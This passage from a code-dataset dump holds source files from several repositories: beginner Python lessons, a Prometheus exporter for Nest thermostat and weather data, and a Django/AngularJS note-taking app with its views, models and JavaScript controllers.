0.5140351057052612, "alphanum_fraction": 0.5280701518058777, "avg_line_length": 14.86111068725586, "blob_id": "c80480c74b1dd1163504d83982a814f4de0e8ac6", "content_id": "23cd4056032a324c693be4448d79f6f37ba9b44b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 570, "license_type": "no_license", "max_line_length": 43, "num_lines": 36, "path": "/3types.py", "repo_name": "ivan-yosifov/python-2019", "src_encoding": "UTF-8", "text": "########################\n# Learn Python 2019\n########################\n\nimport os\nos.system('clear')\n\n##############################\n# DATA TYPES\n# Strings\n# Numbers\n# Lists\n# Tuples - list that can't be changed\n# Dictionaries\n# Boolean\n##############################\n\nfirst_name = 'Megan'\nage = 41\n\nfriends = ['Jennifer','Britney','Jessica']\nprint(friends[0])\n\nfoods = ('pizza', 'ice cream', 'chocolate')\nprint(foods[0])\n\nfav_pizza = {\n 'John': 'Bacon',\n 'Megan': 'Mushroom',\n 'Mary': 'Cheese'\n}\nprint(fav_pizza['Megan'])\n\nmarried = True\npretty = False\nprint(married)" }, { "alpha_fraction": 0.6003975868225098, "alphanum_fraction": 0.6143141388893127, "avg_line_length": 19.1200008392334, "blob_id": "53564278a4ac85ba599801dfc230de06924b3865", "content_id": "8215697836716c08b32cc2497bae67118a5b7bfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 503, "license_type": "no_license", "max_line_length": 50, "num_lines": 25, "path": "/4strings.py", "repo_name": "ivan-yosifov/python-2019", "src_encoding": "UTF-8", "text": "########################\n# Learn Python 2019\n########################\n\nimport os\nos.system('clear')\n\ngreetings = \"My boss yelled \\\"Get back to work!\\\"\"\nprint(greetings)\n\nfirst_name = 'Megan'\nlast_name = 'Fox'\nprint(first_name + ' ' + last_name)\n\nprint(first_name.upper())\nprint(first_name.lower())\nprint(first_name.capitalize())\nprint(first_name.title())\nprint(first_name.swapcase())\n\nprint(len(first_name))\n\nprint(first_name[0])\nprint(first_name[0:3]) # Meg\nprint(first_name.split('g')) # ['Me', 'an']\n" }, { "alpha_fraction": 0.41474655270576477, "alphanum_fraction": 0.48847925662994385, "avg_line_length": 11.11111068725586, 
"blob_id": "a08043fde42ee1965e706ce8fdb77b0e561a2ebb", "content_id": "75354f622801a3af6f41d8c030974d65ea86d961", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 24, "num_lines": 18, "path": "/5numbers.py", "repo_name": "ivan-yosifov/python-2019", "src_encoding": "UTF-8", "text": "########################\n# Learn Python 2019\n########################\n\nimport os\nos.system('clear')\n\nnum = 10\nprint(float(num))\n\nprice = 10.25\nprint(int(price))\n\nprint(7 + 2)\nprint(5**2)\n\nnum = \"5\"\nprint(int(num) + 9)" } ]
5
dmegyesi/nest-prometheus
https://github.com/dmegyesi/nest-prometheus
a160cc47bea7898b485d2e37e1f3d97c96dcc8e8
8a0ad67d490b8a20ec843857e3769bc026c07aea
ab6a9250b2672772541519255def2c1877051766
refs/heads/master
2021-07-14T14:43:10.206673
2018-12-25T23:51:52
2018-12-25T23:51:52
145,924,582
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.659069299697876, "alphanum_fraction": 0.6650047302246094, "avg_line_length": 46.325843811035156, "blob_id": "3eecca3b2cff0beccbe2736046dd748fa760df41", "content_id": "18493b8604820d7fc654ded7bbe5ad945d3c5b71", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4216, "license_type": "permissive", "max_line_length": 215, "num_lines": 89, "path": "/metrics.py", "repo_name": "dmegyesi/nest-prometheus", "src_encoding": "UTF-8", "text": "from prometheus_client import start_http_server, Summary, Gauge\nimport pyowm\nimport configparser\nimport os\nimport time\nimport sys\nimport nest\n\n\n# Gauges\ng = {\n 'is_online': Gauge('is_online', 'Device connection status with the Nest service', ['structure', 'device']),\n 'has_leaf': Gauge('has_leaf', 'Displayed when the thermostat is set to an energy-saving temperature', ['structure', 'device']),\n 'target_temp': Gauge('target_temp', 'Desired temperature, in half degrees Celsius (0.5°C)', ['structure', 'device']),\n 'current_temp': Gauge('current_temp', 'Temperature, measured at the device, in half degrees Celsius (0.5°C)', ['structure', 'device']),\n 'humidity': Gauge('humidity', 'Humidity, in percent (%) format, measured at the device, rounded to the nearest 5%', ['structure', 'device']),\n 'state': Gauge('state', 'Indicates whether HVAC system is actively heating, cooling or is off. Use this value to indicate HVAC activity state', ['structure', 'device']),\n 'mode': Gauge('mode', 'Indicates HVAC system heating/cooling modes, like Heat•Cool for systems with heating and cooling capacity, or Eco Temperatures for energy savings', ['structure', 'device']),\n 'time_to_target': Gauge('time_to_target', 'The time, in minutes, that it will take for the structure to reach the target temperature', ['structure', 'device']),\n \n 'weather_current_temp': Gauge('weather_current_temp', 'Current temperature, in Celsius', ['city']),\n 'weather_current_humidity': Gauge('weather_current_humidity', 'Current humidity, in percent (%)', ['city']),\n}\n\n# Create a metric to track time spent and requests made.\nREQUEST_TIME = Summary('request_processing_seconds', 'Time spent processing request')\n# Decorate function with metric.\n@REQUEST_TIME.time()\ndef polling(napi, o):\n print(\"%s - Polling!\" % time.time())\n\n loc = o.get_location()\n city = loc.get_name()\n w = observation.get_weather()\n\n #w.get_temperature('celsius')['temp']\n for structure in napi.structures:\n for device in structure.thermostats:\n g['is_online'].labels(structure.name, device.name).set(device.online)\n g['has_leaf'].labels(structure.name, device.name).set(device.has_leaf)\n g['target_temp'].labels(structure.name, device.name).set(device.target)\n g['current_temp'].labels(structure.name, device.name).set(device.temperature)\n g['humidity'].labels(structure.name, device.name).set(device.humidity)\n g['state'].labels(structure.name, device.name).set((0 if device.hvac_state == \"off\" else 1))\n g['mode'].labels(structure.name, device.name).set((0 if device.mode == \"off\" else 1))\n g['time_to_target'].labels(structure.name, device.name).set(''.join(x for x in device.time_to_target if x.isdigit()))\n\n g['weather_current_temp'].labels(city).set(w.get_temperature('celsius')['temp'])\n g['weather_current_humidity'].labels(city).set(w.get_humidity())\n\n\nif __name__ == '__main__':\n c = configparser.ConfigParser()\n c.read(os.path.join(os.path.abspath(os.path.dirname(__file__)),'settings.ini'))\n\n # Setup Nest 
account\n start_time = time.time()\n\n napi = nest.Nest(client_id=c['nest']['client_id'], client_secret=c['nest']['client_secret'], access_token_cache_file=os.path.join(os.path.abspath(os.path.dirname(__file__)),c['nest']['access_token_cache_file']))\n \n resp_time = time.time() - start_time\n sys.stderr.write(\"Nest API: %0.3fs\\n\" % resp_time)\n\n if napi.authorization_required:\n print(\"Go to \" + napi.authorize_url + \" to authorize, then enter PIN below\")\n if sys.version_info[0] < 3:\n pin = raw_input(\"PIN: \")\n else:\n pin = input(\"PIN: \")\n napi.request_token(pin)\n\n\n # Setup OpenWeatherMap account\n start_time = time.time()\n\n owm = pyowm.OWM(c['owm']['owm_id'])\n observation = owm.weather_at_id(int(c['owm']['owm_city_id']))\n\n resp_time = time.time() - start_time\n sys.stderr.write(\"OpenWeatherMap API: %0.3fs\\n\" % resp_time)\n \n\n # Start up the server to expose the metrics.\n start_http_server(8000)\n sys.stdout.write(\"Listening on port 8000...\\n\")\n \n while True:\n polling(napi, observation)\n time.sleep(60)\n" }, { "alpha_fraction": 0.7240506410598755, "alphanum_fraction": 0.746835470199585, "avg_line_length": 27.214284896850586, "blob_id": "d6aff331b85185e7282d509fcbb758d366d71e09", "content_id": "aea18e6bd4a7db5bbcfc36026f0fb4501807ff04", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 395, "license_type": "permissive", "max_line_length": 89, "num_lines": 14, "path": "/README.md", "repo_name": "dmegyesi/nest-prometheus", "src_encoding": "UTF-8", "text": "# Prometheus client for Nest API\n\nThis is a client application which fetches\n- the current state of my Nest thermostat\n- the current weather conditions, based on the OpenWeatherMap API\n\nSee `example/` folder for example outputs.\n\n## Dev environment\n`docker run --rm -ti -v $(pwd):/app -w /app --entrypoint sh -p 8080:8000 python:3-alpine`\n\n- pip install -r requirements.txt\n\n- python metrics.py\n" } ]
2
daejoon/learning-python
https://github.com/daejoon/learning-python
3a1fd1f1445393e31dd53a7484fd9d56e0b2250a
d3446307f626721eaaf0bd63112dd728dc187212
21a152319c839b3b61a102e2cf4b539f9e5e2870
refs/heads/master
2021-10-11T09:35:51.082784
2019-01-24T08:27:15
2019-01-24T08:27:15
34,562,318
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5784174799919128, "alphanum_fraction": 0.5793613195419312, "avg_line_length": 32.109375, "blob_id": "60790b4ca641540548445e2b1917065fd7647783", "content_id": "b41136e6d0a4cc84b5b6010091a4963b5137b120", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6509, "license_type": "no_license", "max_line_length": 146, "num_lines": 192, "path": "/DjangoApp/quicksilver/views.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport re\n\nfrom django.views.generic.base import TemplateView, View\n\nfrom django.forms.models import model_to_dict\nfrom django.db.models import Q\n\nfrom django.utils import timezone\nimport logging\n\nfrom quicksilver.decorations.set_variable import setTplViewVariable\nfrom quicksilver.utils.ajax_util import AjaxResponse, AjaxRequest\nfrom quicksilver.models import NoteBook, Note\n\n\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\nclass HomeView(TemplateView):\n template_name = 'quicksilver/home.html'\n\n @setTplViewVariable(\"appName\", \"quicksilver\")\n @setTplViewVariable(\"title\", \"QuickSilver\")\n def get_context_data(self, **kwargs):\n logger.debug(\"home - get_context_data\")\n context = super(HomeView, self).get_context_data(**kwargs)\n return context\n\n# angular template 호출 페이지\nclass AngularTplView(TemplateView):\n def get_context_data(self, **kwargs):\n self.template_name = \"quicksilver/tpl/\" + kwargs['page_name'] + \".html\"\n return super(AngularTplView, self).get_context_data(**kwargs)\n\nclass NotebookListView(View):\n\n def post(self, request, *args, **kwargs):\n pass\n\n def get(self, request, *args, **kwargs):\n qs = NoteBook.objects.filter(isDelete=False).order_by('-regDate')\n\n listData = [model_to_dict(item) for item in list(qs)]\n for notebook in listData:\n notebook['type'] = 'notebook'\n notebook['noteCnt'] = Note.objects.filter(notebook__pk=notebook['id'], isDelete=False).count()\n\n # Trash 추가한다.\n listData.append({\n 'type': 'trash',\n 'id': 0,\n 'title': 'Trash',\n 'isModify': False,\n 'noteCnt': Note.objects.filter(isDelete=True).order_by('-regDate').count()\n })\n\n return AjaxResponse(listData)\n\n # notebook을 삭제하면 실제 삭제하지 않는다. 
isDelete flag만 False 로 변경한다.\n # 실제 삭제는 Trash에서 이루어 진다.\n def delete(self, request, *args, **kwargs):\n try:\n model = NoteBook.objects.get(pk=kwargs['notebook_id'])\n model.isDelete = True\n model.deleteDate = timezone.now()\n model.save()\n Note.objects.filter(notebook__pk=kwargs['notebook_id']).update(isDelete=True, deleteDate=timezone.now())\n except:\n pass\n\n return AjaxResponse()\n\n def put(self, request, *args, **kwargs):\n ajaxRequest = AjaxRequest(request)\n data = ajaxRequest.getData()\n\n try:\n # 신규\n if int(data['id']) == 0:\n model = NoteBook()\n else:\n model = NoteBook.objects.get(pk=data['id'])\n except:\n model = NoteBook()\n\n model.modifyDate = timezone.now()\n for field in NoteBook._meta.get_fields():\n if field.name in data:\n if not (bool(re.search('date', field.name, flags=re.IGNORECASE)) or bool(re.search('id', field.name, flags=re.IGNORECASE))):\n model.__dict__[field.name] = data[field.name]\n\n model.save()\n notes = Note.objects.filter(notebook__pk=model.pk, isDelete=False)\n\n cvt_model = model_to_dict(model)\n cvt_model['type'] = 'notebook'\n cvt_model['noteCnt'] = notes.count()\n return AjaxResponse(cvt_model)\n\n\nclass TrashView(View):\n def get(self, request, *args, **kwargs):\n qs = Note.objects.filter(isDelete=True)\n return AjaxResponse(qs)\n\n def delete(self, request, *args, **kwargs):\n # 실제 테이블에서 삭제가 이루어진다.\n try:\n if 'note_id' in kwargs and kwargs['note_id'] != None:\n Note.objects.filter(pk=kwargs['note_id']).delete()\n else:\n Note.objects.filter(isDelete=True).delete()\n NoteBook.objects.filter(isDelete=True).delete()\n except:\n pass\n\n return AjaxResponse()\n\n\nclass RecentNoteView(View):\n def get(self, request, *args, **kwargs):\n qs = Note.objects.filter(isDelete=False).order_by('-modifyDate', '-regDate')[:5]\n return AjaxResponse(qs)\n\n\nclass NoteListView(View):\n def get(self, request, *args, **kwargs):\n notebookType = None\n\n #notebook\n if 'notebook_id' in kwargs and int(kwargs['notebook_id']) > 0:\n qs = Note.objects.filter(notebook__pk=kwargs['notebook_id'], isDelete=False).order_by('-regDate')\n notebookType = \"notebook\"\n #search\n elif 'search_text' in kwargs:\n qs = Note.objects\\\n .filter(isDelete=False)\\\n .filter(Q(title__icontains=kwargs['search_text']) | Q(content__icontains=kwargs['search_text']))\\\n .order_by('-regDate')\n notebookType = \"search\"\n #trash\n else:#Trash List\n qs = Note.objects.filter(isDelete=True).order_by('-deleteDate', '-regDate')\n notebookType = \"trash\"\n\n return AjaxResponse(qs, paramDic={'notebookType':notebookType})\n\n\nclass NoteView(View):\n def get(self, request, *args, **kwargs):\n qs = Note.objects.get(pk=kwargs['note_id'])\n return AjaxResponse(qs)\n\n # 실제로 삭제하지 않는다. 
isDelete flag만 변경해준다.\n def delete(self, request, *args, **kwargs):\n try:\n note = Note.objects.get(pk=kwargs['note_id'])\n note.isDelete = True\n note.save()\n except:\n pass\n\n return AjaxResponse()\n\n def put(self, request, *args, **kwargs):\n ajaxRequest = AjaxRequest(request)\n data = ajaxRequest.getData()\n\n if bool(data):\n try:\n # 신규\n if int(data['id']) == 0:\n model = Note()\n else:\n model = Note.objects.get(pk=data['id'])\n except:\n model = Note()\n\n model.modifyDate = timezone.now()\n for field in Note._meta.get_fields():\n if field.name in data:\n if not (bool(re.search('date', field.name, flags=re.IGNORECASE)) or bool(re.search('^id$', field.name, flags=re.IGNORECASE))):\n model.__dict__[field.name] = data[field.name]\n\n notebook = NoteBook.objects.get(pk=data['notebook'])\n model.notebook = notebook\n model.save()\n return AjaxResponse(model)\n else:\n return AjaxResponse()\n" }, { "alpha_fraction": 0.7273755669593811, "alphanum_fraction": 0.7341628670692444, "avg_line_length": 34.400001525878906, "blob_id": "519c09c2466018025b9831defc1b57584faff377", "content_id": "36cabbdc7fbdeaa719884a3ad15f9fd76b905573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 884, "license_type": "no_license", "max_line_length": 70, "num_lines": 25, "path": "/DjangoApp/quicksilver/models.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\nclass NoteBook(models.Model):\n title = models.CharField(max_length=255)\n isDelete = models.BooleanField(default=False)\n regDate = models.DateTimeField(default=timezone.now)\n modifyDate = models.DateTimeField(default=timezone.now, null=True)\n deleteDate = models.DateTimeField(null=True)\n\n def __unicode__(self):\n return self.title\n\nclass Note(models.Model):\n title = models.CharField(max_length=255)\n content = models.TextField(null=True)\n isDelete = models.BooleanField(default=False)\n regDate = models.DateTimeField(default=timezone.now)\n modifyDate = models.DateTimeField(default=timezone.now, null=True)\n deleteDate = models.DateTimeField(null=True)\n notebook = models.ForeignKey(NoteBook)\n\n def __unicode__(self):\n return self.title" }, { "alpha_fraction": 0.7424892783164978, "alphanum_fraction": 0.7424892783164978, "avg_line_length": 22.399999618530273, "blob_id": "63aa9a94d36410fa9f199b51b110d7ab1b030547", "content_id": "07e6ea319feed2b3eb0d893a50e66b2ceba53a8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 233, "license_type": "no_license", "max_line_length": 46, "num_lines": 10, "path": "/DjangoApp/quicksilver/templatetags/settings_tags.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "__author__ = 'kdj'\n\nfrom django import template\nfrom django.conf import settings\n\nregister = template.Library()\n\n@register.assignment_tag(takes_context=True)\ndef get_my_setting(context):\n return getattr(settings, 'MY_SETTING', '')" }, { "alpha_fraction": 0.5743243098258972, "alphanum_fraction": 0.5743243098258972, "avg_line_length": 30.510639190673828, "blob_id": "989f6a8436e1a199f328c4182ca948f34818f45f", "content_id": "dd95b301aa6abc0c9b593d75efb08a3a07c458e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1480, "license_type": "no_license", "max_line_length": 93, "num_lines": 47, "path": 
"/DjangoApp/quicksilver/utils/ajax_util.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "__author__ = 'kdj'\nimport json\n\nfrom django.http import JsonResponse\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models.query import QuerySet\nfrom django.db import models\nfrom django.forms.models import model_to_dict\n\n\nclass AjaxResponse(JsonResponse):\n def __init__(self, data={}, paramDic={}, encoder=DjangoJSONEncoder, safe=True, **kwargs):\n newData = dict()\n try:\n if isinstance(data, QuerySet):\n newData['data'] = [model_to_dict(item) for item in list(data)]\n elif isinstance(data, models.Model):\n newData['data'] = model_to_dict(data)\n else:\n newData['data'] = data\n\n if 'message' in kwargs:\n newData['message'] = kwargs['message']\n else:\n newData['message'] = ''\n except Exception as e:\n newData['status'] = False\n newData['message'] = str(e)\n else:\n newData['status'] = True\n finally:\n newData = dict(newData.items() + paramDic.items())\n super(AjaxResponse, self).__init__(newData, encoder, safe, **kwargs)\n\nclass AjaxRequest(object):\n def __init__(self, request):\n self.request = request\n\n def getData(self):\n data = json.loads(self.request.body)\n if 'data' in data:\n return data['data']\n else:\n return data\n\n def getRequest(self):\n return self.request" }, { "alpha_fraction": 0.37472331523895264, "alphanum_fraction": 0.37638336420059204, "avg_line_length": 39.69819641113281, "blob_id": "ce39b3ec9acb101e934b819b0854e75b7212fd7b", "content_id": "f6409a035f9f715174e90fbec0c04c316ba89016", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 9252, "license_type": "no_license", "max_line_length": 105, "num_lines": 222, "path": "/DjangoApp/static/js/quicksilver/controllers/noteListCtrl.js", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": ";\n(function (angular, $, _, console) {\n var modduleName = \"quicksilver.controller\";\n var controllerName = \"noteListCtrl\";\n\n angular\n .module(modduleName)\n .controller(controllerName, [\n '$scope', '$rootScope', '$timeout', '$q', 'noteListSvc', 'noteSvc', 'quicksilverModelSvc',\n function($scope, $rootScope, $timeout, $q, noteListSvc, noteSvc, quicksilverModelSvc) {\n 'use strict';\n\n $scope.noteList = [];\n $scope.noteListIndex = -1;\n $scope.currentNotebook = quicksilverModelSvc.createNoteBook();\n $scope.notebookType = \"\";\n\n /**\n * 메뉴가 보일때\n * @param $index\n */\n $scope.showContextMenu = function ($index) {\n $scope.noteListIndex = $index;\n\n // 마지막 요소인지 검사한다.\n if ( $scope.notebookType.toLowerCase() === \"trash\") {\n $(\"#note-contextmenu\")\n .find(\"li\")\n .hide()\n .end()\n .find(\"li\")\n .last()\n .show();\n } else if ($scope.notebookType.toLowerCase() === \"notebook\") {\n $(\"#note-contextmenu\")\n .find(\"li\")\n .show();\n } else if ( $scope.notebookType.toLowerCase() === \"search\" ) {\n $(\"#note-contextmenu\")\n .find(\"li\")\n .hide()\n .end()\n .find(\"li\")\n .last()\n .show();\n }\n };\n\n /**\n * 새로운 노트를 추가한다.\n * @param $event\n */\n $scope.addNote = function (newNote) {\n if ( $scope.currentNotebook.id > 0 ) {\n newNote = newNote || quicksilverModelSvc.createNote();\n newNote.notebook = $scope.currentNotebook.id;\n newNote.id = 0;\n noteSvc\n .addNote(newNote)\n .success(function (data, status, headers, config) {\n $scope.noteList.unshift(quicksilverModelSvc.copyNote(data.data));\n $scope.selectNote(0);\n $scope.currentNotebook.noteCnt++;\n\n 
$rootScope.$broadcast('recentNoteListCtrl:changeNoteList');\n });\n }\n };\n\n /**\n * 리스트에서 노트를 선택한다.\n * @param $index\n */\n $scope.selectNote = function($index) {\n $scope.noteListIndex = $index;\n $rootScope.$broadcast(\"noteCtrl:selectNote\", $scope.noteList[$index]);\n _.each($scope.noteList, function (val, idx) {\n val.isFocus = (idx === $index)?true:false;\n });\n };\n\n /**\n * 노트를 복사할때 이벤트\n */\n $scope.$on(\"noteListCtrl:duplicateNote\", function (e) {\n var copyItem = $scope.noteList[$scope.noteListIndex];\n $scope.addNote(copyItem);\n });\n\n /**\n * 노트를 삭제할때 이벤트\n */\n $scope.$on(\"noteListCtrl:deleteNote\", function (e) {\n var deleteNote = $scope.noteList[$scope.noteListIndex];\n var fnName = \"deleteNote\";\n\n switch ($scope.notebookType.toLowerCase()) {\n case \"notebook\":\n case \"search\":\n fnName = \"deleteNote\";\n break;\n case \"trash\":\n fnName = \"trashDeleteNote\";\n break;\n }\n\n noteSvc[fnName](deleteNote)\n .success(function (data, status, headers, config) {\n $rootScope.$broadcast('recentNoteListCtrl:changeNoteList');\n $rootScope.$broadcast('notebookListCtrl:changeNoteCnt', {\n notebook_id: deleteNote.notebook,\n notebookType: $scope.notebookType\n });\n $scope.noteList.splice($scope.noteListIndex,1);\n $scope.selectNote(0);\n })\n .error(function(data, status) {\n console.log(status);\n });\n });\n\n /**\n * 노트북이 선택되었을때 이벤트\n */\n $scope.$on(\"noteListCtrl:selectNotebook\", function (e, notebookObj, note) {\n $scope.currentNotebook = notebookObj;\n\n noteListSvc\n .getNoteList(notebookObj.id && notebookObj.id || 0)\n .success(function (data, status, headers, config) {\n var index = -1;\n $scope.notebookType = data.notebookType;\n\n $scope.noteList = [];\n _.each(data.data, function (val, idx) {\n if (_.isObject(note) && note.id === val.id ) {\n index = idx;\n }\n $scope.noteList.push(quicksilverModelSvc.createNote(val));\n });\n\n if ( $scope.noteList.length > 0 ) {\n if ( _.isObject(note) ) {\n $scope.selectNote(index);\n } else {\n $scope.selectNote(0);\n }\n }\n });\n });\n\n /**\n * 이전 노트로 이동\n */\n $scope.$on(\"noteListCtrl:prevNote\", function (e) {\n if ( $scope.noteListIndex > 0 ) {\n $scope.selectNote($scope.noteListIndex - 1);\n }\n });\n\n /**\n * 이후 노트로 이동\n */\n $scope.$on(\"noteListCtrl:nextNote\", function (e) {\n if ( $scope.noteListIndex < $scope.noteList.length-1 ) {\n $scope.selectNote($scope.noteListIndex + 1);\n }\n });\n\n /**\n * 검색\n */\n $scope.$on(\"noteListCtrl:searchText\", function (e, searchText) {\n noteListSvc\n .getNoteListSearch(searchText)\n .success(function (data, status, headers, config) {\n $scope.notebookType = data.notebookType;\n\n $scope.noteList = [];\n _.each(data.data, function (val, idx) {\n $scope.noteList.push(quicksilverModelSvc.createNote(val));\n });\n $scope.selectNote(0);\n });\n });\n\n /**\n * 현재 노트북을 감시한다.\n */\n $scope.$watch('currentNotebook', function (newValue, oldValue) {\n console.log(\"watch currentNotebook newValue=\" + newValue + \", oldValue=\" + oldValue);\n }, true);\n\n /**\n * 노트리스트를 감시한다.\n */\n $scope.$watchCollection('noteList', function (newValue, oldValue) {\n $rootScope.$broadcast('recentNoteListCtrl:changeNoteList');\n });\n }])\n .controller('noteContextMenuCtrl', [\n '$scope', '$rootScope', '$element',\n function($scope, $rootScope, $element) {\n 'use strict';\n\n $scope.duplicateNote = function ($event) {\n $rootScope.$broadcast(controllerName + \":duplicateNote\");\n $element.removeClass(\"open\");\n };\n\n $scope.deleteNote = function ($event) {\n 
$rootScope.$broadcast(controllerName + \":deleteNote\");\n $element.removeClass(\"open\");\n };\n }]);\n})(angular, jQuery, _, window.console&&window.console||{\n log: function() {},\n debug: function() {},\n info: function() {},\n warning: function() {},\n error: function() {}\n});\n\n" }, { "alpha_fraction": 0.44438695907592773, "alphanum_fraction": 0.44542163610458374, "avg_line_length": 34.77777862548828, "blob_id": "99e02d05365a5a3e36772698b97740dd37e53495", "content_id": "981484158ca33c5ce6c9edec9515427572669fef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1989, "license_type": "no_license", "max_line_length": 109, "num_lines": 54, "path": "/DjangoApp/static/js/quicksilver/controllers/recentNoteListCtrl.js", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": ";\n(function (angular, $, _, console) {\n var moduleName = 'quicksilver.controller';\n var controllerName = \"recentNoteListCtrl\";\n\n angular\n .module(moduleName)\n .controller(controllerName, [\n '$scope', '$rootScope', '$timeout', '$element', '$q', 'recentNoteListSvc', 'quicksilverModelSvc',\n function($scope, $rootScope, $timeout, $element, $q, recentNoteListSvc, quicksilverModelSvc) {\n 'use strict';\n\n $scope.recentNoteListIndex = -1;\n $scope.recentNoteList = [];\n\n /**\n * 최근 사용목록 리스트를 갱신한다.\n */\n $scope.refash = function () {\n recentNoteListSvc\n .getRecentNoteList()\n .success(function (data, status, headers, config) {\n $scope.recentNoteListIndex = -1;\n $scope.recentNoteList = [];\n _.each(data.data, function (val, idx) {\n $scope.recentNoteList.push(quicksilverModelSvc.createNote(val));\n });\n });\n };\n\n /**\n * 최근 노트를 클릭한다.\n * @param $index\n */\n $scope.clickRecentNote = function ($index) {\n $rootScope.$broadcast(\"notebookListCtrl:selectNoteBook\", $scope.recentNoteList[$index]);\n };\n\n /**\n * 변경 이벤트\n */\n $scope.$on('recentNoteListCtrl:changeNoteList', function (e) {\n $scope.refash();\n });\n\n $scope.refash();\n }]);\n})(angular, jQuery, _, window.console&&window.console||{\n log: function() {},\n debug: function() {},\n info: function() {},\n warning: function() {},\n error: function() {}\n});\n\n" }, { "alpha_fraction": 0.4055604636669159, "alphanum_fraction": 0.406663715839386, "avg_line_length": 34.67716598510742, "blob_id": "3d89e40e7001f3d419769560c164e028aba404c3", "content_id": "46135f966b42f3c24cf46bb901b6280a4b92f0a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4542, "license_type": "no_license", "max_line_length": 81, "num_lines": 127, "path": "/DjangoApp/static/js/quicksilver/services/service.js", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": ";\n(function (angular, $, _, console) {\n var moduleName = \"quicksilver.service\";\n\n angular.module(moduleName)\n .factory('quicksilverModelSvc', [\n function() {\n\n var _removeHashkey = function(setting) {\n return _.omit(setting||{}, '$$hashKey');\n };\n\n return {\n createNoteBook: function(setting) {\n return _.extendOwn({\n id: 0,\n type: 'notebook', // notebook, search, trash 3가지 종류\n title: 'Untitled Notebook',\n isDelete: false,\n isModify: false,\n isFocus: false,\n regDate: '',\n modifyDate: '',\n deleteDate: '',\n noteCnt: 0\n }, setting||{});\n },\n createNote: function(setting) {\n return _.extendOwn({\n id: 0,\n title: 'Untitled Note',\n content: '',\n isDelete: false,\n isFocus: false,\n regDate: '',\n modifyDate: '',\n deleteDate: '',\n 
notebook: 0 // NoteBook의 id\n }, setting||{});\n },\n copyNoteBook: function(setting, bDeleteHashKey) {\n if ( bDeleteHashKey || true ) {\n setting = _removeHashkey(setting)\n }\n return this.createNoteBook(setting);\n },\n copyNote: function(setting, bDeleteHashKey) {\n if ( bDeleteHashKey || true ) {\n setting = _removeHashkey(setting)\n }\n return this.createNote(setting);\n }\n };\n }])\n .factory('notebookListSvc', [\n '$http',\n function ($http) {\n\n return {\n getNoteBookList: function() {\n return $http.get(\"/quicksilver/notebook\");\n },\n addNoteBook: function(notebook) {\n console.log(\"addNoteBook\", notebook);\n return $http.put(\"/quicksilver/notebook\", {data:notebook});\n },\n deleteNoteBook: function(notebook) {\n console.log(\"deleteNoteBook\", notebook);\n return $http.delete(\"/quicksilver/notebook/\"+notebook.id);\n },\n getTrashNoteList: function() {\n return $http.get(\"/quicksilver/trash\");\n },\n deleteTrashNoteList: function() {\n return $http.delete(\"/quicksilver/trash\");\n }\n };\n }])\n .factory('noteListSvc', [\n '$http',\n function ($http) {\n\n return {\n getNoteList: function(notebook_id) {\n return $http.get(\"/quicksilver/notelist/\"+notebook_id);\n },\n getNoteListSearch: function(searchText) {\n return $http.get(\"/quicksilver/notelist/search/\"+searchText);\n }\n };\n }])\n .factory('recentNoteListSvc', [\n '$http',\n function ($http) {\n\n return {\n getRecentNoteList: function() {\n return $http.get(\"/quicksilver/recentnote\");\n }\n };\n }])\n .factory('noteSvc', [\n '$http',\n function ($http) {\n\n return {\n getNote: function(noteObj) {\n return $http.get(\"/quicksilver/note/\" + noteObj.id);\n },\n addNote: function(noteObj) {\n return $http.put(\"/quicksilver/note\", {data:noteObj});\n },\n deleteNote: function(noteObj) {\n return $http.delete(\"/quicksilver/note/\"+noteObj.id);\n },\n trashDeleteNote: function(noteObj) {\n return $http.delete(\"/quicksilver/trash/\" + noteObj.id);\n }\n };\n }]);\n})(angular, jQuery, _, window.console&&window.console||{\n log: function() {},\n debug: function() {},\n info: function() {},\n warning: function() {},\n error: function() {}\n});\n\n" }, { "alpha_fraction": 0.7064515948295593, "alphanum_fraction": 0.7064515948295593, "avg_line_length": 33.44444274902344, "blob_id": "fabc6259a271f902c3f52c86001b81ada20daec4", "content_id": "8a36871d68c652f91958e6f6c9995c149e8a4797", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 80, "num_lines": 9, "path": "/DjangoApp/DjangoApp/urls.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom quicksilver.views import HomeView\n\nurlpatterns = [\n url(r'^$', HomeView.as_view(), name=\"home\"),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^quicksilver/', include('quicksilver.urls', namespace='quicksilver')),\n]\n" }, { "alpha_fraction": 0.4736842215061188, "alphanum_fraction": 0.4736842215061188, "avg_line_length": 18, "blob_id": 